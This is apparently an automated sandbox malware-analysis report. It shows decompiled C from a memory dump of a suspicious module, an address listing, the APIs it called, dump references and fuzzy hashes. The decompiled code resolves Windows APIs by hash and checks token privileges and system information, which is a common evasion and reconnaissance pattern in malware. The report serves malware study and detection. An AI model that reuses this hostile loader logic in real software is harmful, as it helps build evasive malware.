															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E72AE54C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E72ADD098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E72AE54C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E72ADD098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E72AE54C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E72ADD098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E72AE54C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E72ADD098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E72AE54C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x72aed1f8 + 0x24)) = _t186;
							_t187 = E72AE10CC(0xffffffffffffffff);
							_t314 =  *0x72aed1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x72aed1f8 + 0x2c)) = E72AE1140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E72AE2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x72aed1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E72AE352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E72AE2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E72AE352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E72ADF620(_t424 + 0x18c, _t202);
											_t403 = E72AE2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E72ADF6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E72ADF558(_t424 + 0x18c, 0);
												_t209 = E72ADF568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E72AE352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E72ADF558(_t424 + 0x18c, 0);
													E72ADDFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E72AE2F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E72ADE070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E72AE2F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E72ADE11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E72AE4BE0( *((intOrPtr*)(_t424 + 0x1b8)), E72ADE94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E72ADE054(_t424 + 0x1b8);
														E72ADE054(_t424 + 0x1b0);
														E72ADF6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E72ADBC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x72aed1f8 + 0x2c)) = 6;
															L78:
															_t192 = E72AE2F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x72aed1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E72ADBC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E72AE352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E72AE2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E72AE352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E72ADF620(_t424 + 0x3c, _t258);
									_t261 = E72AE2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E72ADF6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E72ADF558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E72ADF568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E72AE352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E72ADF558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E72AE2F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E72AE352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E72AE1070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E72AE2F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E72ADBC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x72ae07cc
0x72ae07cd
0x72ae07ce
0x72ae07d0
0x72ae07db
0x72ae07dd
0x72ae07e4
0x72ae1063
0x72ae1069
0x72ae1069
0x72ae07ee
0x72ae07fa
0x72ae0806
0x72ae080b
0x72ae0818
0x72ae0822
0x72ae0829
0x72ae082e
0x72ae0832
0x72ae0836
0x72ae083b
0x72ae083e
0x72ae0844
0x72ae084a
0x72ae0857
0x72ae085e
0x72ae0865
0x72ae0868
0x72ae086b
0x72ae086d
0x72ae0879
0x72ae0886
0x72ae0893
0x72ae0895
0x72ae0897
0x72ae0923
0x72ae0923
0x72ae0929
0x72ae092c
0x72ae0931
0x72ae0934
0x72ae094c
0x72ae094d
0x72ae094d
0x72ae094d
0x72ae0951
0x72ae095a
0x72ae095f
0x72ae095f
0x72ae0961
0x72ae0972
0x72ae0994
0x72ae0996
0x72ae0997
0x72ae099b
0x72ae099b
0x72ae09a4
0x72ae09b0
0x72ae09b9
0x72ae09cf
0x72ae09df
0x72ae09e4
0x72ae09e8
0x72ae09ed
0x72ae09ef
0x72ae0a3f
0x72ae0a54
0x72ae0a58
0x72ae0a5d
0x72ae0a6e
0x72ae0a83
0x72ae0a87
0x72ae0a8c
0x72ae0a8e
0x72ae0ad5
0x72ae0ad8
0x72ae0b26
0x72ae0b29
0x00000000
0x72ae0b2b
0x72ae0b2b
0x72ae0b2e
0x00000000
0x72ae0b30
0x72ae0b34
0x72ae0b39
0x72ae0b3e
0x72ae0b40
0x72ae0b44
0x72ae0b46
0x72ae0b4d
0x72ae0b4d
0x72ae0b48
0x72ae0b48
0x72ae0b4b
0x72ae0b51
0x72ae0b51
0x00000000
0x00000000
0x00000000
0x72ae0b4b
0x72ae0b53
0x72ae0b55
0x72ae0b58
0x72ae0b58
0x72ae0b55
0x72ae0b5d
0x72ae0b67
0x72ae0b67
0x72ae0b2e
0x72ae0ada
0x72ae0ada
0x72ae0adc
0x72ae0b1b
0x72ae0b1e
0x72ae0e90
0x72ae0e95
0x72ae0e9a
0x72ae0e9c
0x72ae0ea0
0x72ae0ea2
0x72ae0ea9
0x72ae0ea9
0x72ae0ea4
0x72ae0ea4
0x72ae0ea7
0x72ae0ead
0x72ae0ead
0x00000000
0x00000000
0x00000000
0x72ae0ea7
0x72ae0eaf
0x72ae0eb1
0x72ae0eb4
0x72ae0eb4
0x72ae0eb1
0x72ae0eb9
0x72ae0ec3
0x72ae0b24
0x00000000
0x72ae0b24
0x72ae0ade
0x72ae0ae2
0x72ae0ae7
0x72ae0aec
0x72ae0aee
0x72ae0af2
0x72ae0af4
0x72ae0afb
0x72ae0afb
0x72ae0af6
0x72ae0af6
0x72ae0af9
0x72ae0aff
0x72ae0aff
0x00000000
0x00000000
0x00000000
0x72ae0af9
0x72ae0b01
0x72ae0b03
0x72ae0b06
0x72ae0b06
0x72ae0b03
0x72ae0b0b
0x72ae0b15
0x72ae0b15
0x72ae0adc
0x72ae0a90
0x72ae0a90
0x72ae0a92
0x72ae0b6a
0x72ae0b6e
0x72ae0b73
0x72ae0b78
0x72ae0b7a
0x72ae0b7e
0x72ae0b80
0x72ae0b87
0x72ae0b87
0x72ae0b82
0x72ae0b82
0x72ae0b85
0x72ae0b8b
0x72ae0b8b
0x00000000
0x00000000
0x00000000
0x72ae0b85
0x72ae0b8d
0x72ae0b8f
0x72ae0b92
0x72ae0b92
0x72ae0b8f
0x72ae0b97
0x72ae0b97
0x72ae0b99
0x72ae0a98
0x72ae0a9c
0x72ae0aa1
0x72ae0aa6
0x72ae0aa8
0x72ae0aac
0x72ae0aae
0x72ae0ab5
0x72ae0ab5
0x72ae0ab0
0x72ae0ab0
0x72ae0ab3
0x72ae0ab9
0x72ae0ab9
0x00000000
0x00000000
0x00000000
0x72ae0ab3
0x72ae0abb
0x72ae0abd
0x72ae0ac0
0x72ae0ac0
0x72ae0abd
0x72ae0ac5
0x72ae0acf
0x72ae0acf
0x72ae0a92
0x72ae09f1
0x72ae09f5
0x72ae09fa
0x72ae09ff
0x72ae0a01
0x72ae0a05
0x72ae0a07
0x72ae0a0e
0x72ae0a0e
0x72ae0a09
0x72ae0a09
0x72ae0a0c
0x72ae0a12
0x72ae0a12
0x00000000
0x00000000
0x00000000
0x72ae0a0c
0x72ae0a14
0x72ae0a16
0x72ae0a19
0x72ae0a19
0x72ae0a16
0x72ae0a1e
0x72ae0a28
0x72ae0a28
0x72ae0936
0x72ae0938
0x72ae0938
0x72ae0ba2
0x72ae0ba5
0x72ae0baa
0x72ae0bac
0x72ae0bb5
0x72ae0bc1
0x72ae0bc4
0x72ae0c92
0x72ae0c9a
0x00000000
0x72ae0bca
0x72ae0bd4
0x72ae0be6
0x72ae0be8
0x72ae0bea
0x72ae0c76
0x72ae0c76
0x72ae0c78
0x72ae0c7c
0x72ae0c87
0x72ae0c7e
0x72ae0c7e
0x72ae0c7e
0x00000000
0x72ae0bf0
0x72ae0bfc
0x72ae0bfe
0x72ae0c00
0x72ae104f
0x72ae1054
0x72ae1056
0x00000000
0x72ae105c
0x00000000
0x72ae105c
0x72ae0c06
0x72ae0c06
0x72ae0c17
0x72ae0c1b
0x72ae0c20
0x72ae0c32
0x72ae0c34
0x72ae0c36
0x72ae0c4d
0x72ae0c4f
0x72ae0c51
0x72ae0ec9
0x72ae0ec9
0x72ae0c51
0x72ae0c57
0x72ae0c5e
0x72ae0c60
0x72ae0edb
0x72ae0ef1
0x72ae0ef3
0x72ae0ef5
0x72ae1030
0x72ae1037
0x00000000
0x72ae0efb
0x72ae0f04
0x72ae0f12
0x72ae0f2c
0x72ae0f2e
0x72ae0f30
0x72ae1041
0x72ae1046
0x72ae1048
0x00000000
0x72ae104a
0x00000000
0x72ae104a
0x72ae0f36
0x72ae0f36
0x72ae0f44
0x72ae0f4f
0x72ae0f5e
0x72ae0f70
0x72ae0f72
0x72ae0f74
0x72ae0f81
0x72ae0f81
0x72ae0f91
0x72ae0fa2
0x72ae0fa7
0x72ae0fa9
0x72ae0fbf
0x72ae0fe0
0x72ae0fe9
0x72ae0ff5
0x72ae1001
0x72ae1006
0x72ae100b
0x72ae1011
0x72ae1011
0x72ae1016
0x72ae101c
0x00000000
0x72ae1022
0x72ae1024
0x72ae0c9d
0x72ae0ca9
0x72ae0cb0
0x72ae0cb2
0x72ae0cbc
0x72ae0cbc
0x72ae0cbe
0x72ae0cc0
0x72ae0ccf
0x72ae0cdb
0x72ae0cdf
0x72ae0ce2
0x72ae0ce5
0x72ae0ce8
0x00000000
0x72ae0ce8
0x72ae0fab
0x72ae0fab
0x72ae0fb2
0x72ae0fb3
0x72ae0fb3
0x72ae0fa9
0x72ae0f30
0x72ae0c66
0x72ae0c66
0x72ae0c66
0x72ae0c6b
0x72ae0c71
0x72ae0c71
0x00000000
0x72ae0c6b
0x72ae0c60
0x72ae0c00
0x72ae0bea
0x72ae089d
0x72ae08a9
0x72ae08ab
0x72ae08ad
0x72ae0e7a
0x72ae0e7f
0x72ae0e81
0x00000000
0x72ae0e87
0x00000000
0x72ae0e87
0x72ae08b3
0x72ae08b3
0x72ae08c4
0x72ae08c8
0x72ae08cd
0x72ae08da
0x72ae08e1
0x72ae08e3
0x72ae08fa
0x72ae08fc
0x72ae08fe
0x72ae0cf6
0x72ae0cf6
0x72ae08fe
0x72ae0904
0x72ae090b
0x72ae090d
0x72ae0d05
0x72ae0d16
0x72ae0d1b
0x72ae0d1d
0x72ae0d1f
0x72ae0e50
0x72ae0e54
0x00000000
0x72ae0d25
0x72ae0d2b
0x72ae0d50
0x72ae0d52
0x72ae0d54
0x72ae0e6c
0x72ae0e71
0x72ae0e73
0x00000000
0x72ae0e75
0x00000000
0x72ae0e75
0x72ae0d5a
0x72ae0d5a
0x72ae0d65
0x72ae0d6c
0x72ae0d73
0x72ae0d7a
0x72ae0d7b
0x72ae0d7c
0x72ae0d8e
0x72ae0d90
0x72ae0d92
0x00000000
0x72ae0d98
0x72ae0d9a
0x72ae0db5
0x72ae0db7
0x72ae0db9
0x72ae0e5e
0x72ae0e63
0x72ae0e65
0x00000000
0x72ae0e67
0x00000000
0x72ae0e67
0x72ae0dbf
0x72ae0dbf
0x72ae0dbf
0x72ae0dc6
0x72ae0dca
0x72ae0e35
0x72ae0e35
0x72ae0e37
0x72ae0e3e
0x72ae0e3e
0x72ae0e39
0x72ae0e39
0x72ae0e3c
0x72ae0e42
0x72ae0e42
0x00000000
0x00000000
0x00000000
0x72ae0e3c
0x72ae0e44
0x72ae0e46
0x72ae0e4b
0x72ae0e4b
0x00000000
0x72ae0dcc
0x72ae0dcc
0x72ae0dcc
0x72ae0dce
0x72ae0dda
0x72ae0ddf
0x72ae0de1
0x00000000
0x00000000
0x72ae0e2f
0x72ae0e30
0x72ae0e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x72ae0e33
0x72ae0de3
0x72ae0de7
0x72ae0dee
0x72ae0def
0x72ae0def
0x72ae0dca
0x72ae0db9
0x72ae0d92
0x72ae0d54
0x72ae0913
0x72ae0913
0x72ae0913
0x72ae0918
0x72ae091e
0x72ae091e
0x00000000
0x72ae0918
0x72ae090d
0x72ae08ad
0x72ae082b
0x72ae082b
0x72ae082c
0x72ae082d
0x72ae082d
0x72ae0ceb
0x72ae0ceb
0x72ae0cf5
0x72ae0cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 72AE08FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 72AE0CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 72AE0D50

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 4645b60484cc2f010a99b50d6082c58949a536da7dc57ee74eb10c1e7295393b
Instruction ID: ce082858494721352f46314450f1430372a265d31f42a6ee9100ad7798cbc057
Opcode Fuzzy Hash: 4645b60484cc2f010a99b50d6082c58949a536da7dc57ee74eb10c1e7295393b
Instruction Fuzzy Hash: C422D770A44345AEE711DB2CC982BAF7BA5EF95304F10892DE587A71ADDB30D807CB52

Uniqueness

Uniqueness Score: -1.00%

Function 72AD1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E72AD1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E72ADF620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v76, E72ADF568( &_v76) + 0x10);
				E72ADF558( &_v80, E72ADF568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v84, E72ADF568(_t325) + 0x10);
				E72ADF558( &_v88, E72ADF568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v92, E72ADF568(_t329) + 0x10);
				E72ADF558( &_v96, E72ADF568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v100, E72ADF568(_t333) + 0x10);
				E72ADF558( &_v104, E72ADF568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v108, E72ADF568(_t337) + 0x10);
				E72ADF558( &_v112, E72ADF568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v116, E72ADF568(_t341) + 0x10);
				E72ADF558( &_v120, E72ADF568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v124, E72ADF568(_t345) + 0x10);
				E72ADF558( &_v128, E72ADF568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v132, E72ADF568(_t349) + 0x10);
				E72ADF558( &_v136, E72ADF568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v140, E72ADF568(_t353) + 0x10);
				E72ADF558( &_v144, E72ADF568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v148, E72ADF568(_t357) + 0x10);
				E72ADF558( &_v152, E72ADF568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v156, E72ADF568(_t361) + 0x10);
				E72ADF558( &_v160, E72ADF568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v164, E72ADF568(_t365) + 0x10);
				E72ADF558( &_v168, E72ADF568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v172, E72ADF568(_t369) + 0x10);
				E72ADF558( &_v176, E72ADF568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v180, E72ADF568(_t373) + 0x10);
				E72ADF558( &_v184, E72ADF568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v188, E72ADF568(_t377) + 0x10);
				E72ADF558( &_v192, E72ADF568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E72ADF8C4( &_v196, E72ADF568(_t381) + 0x10);
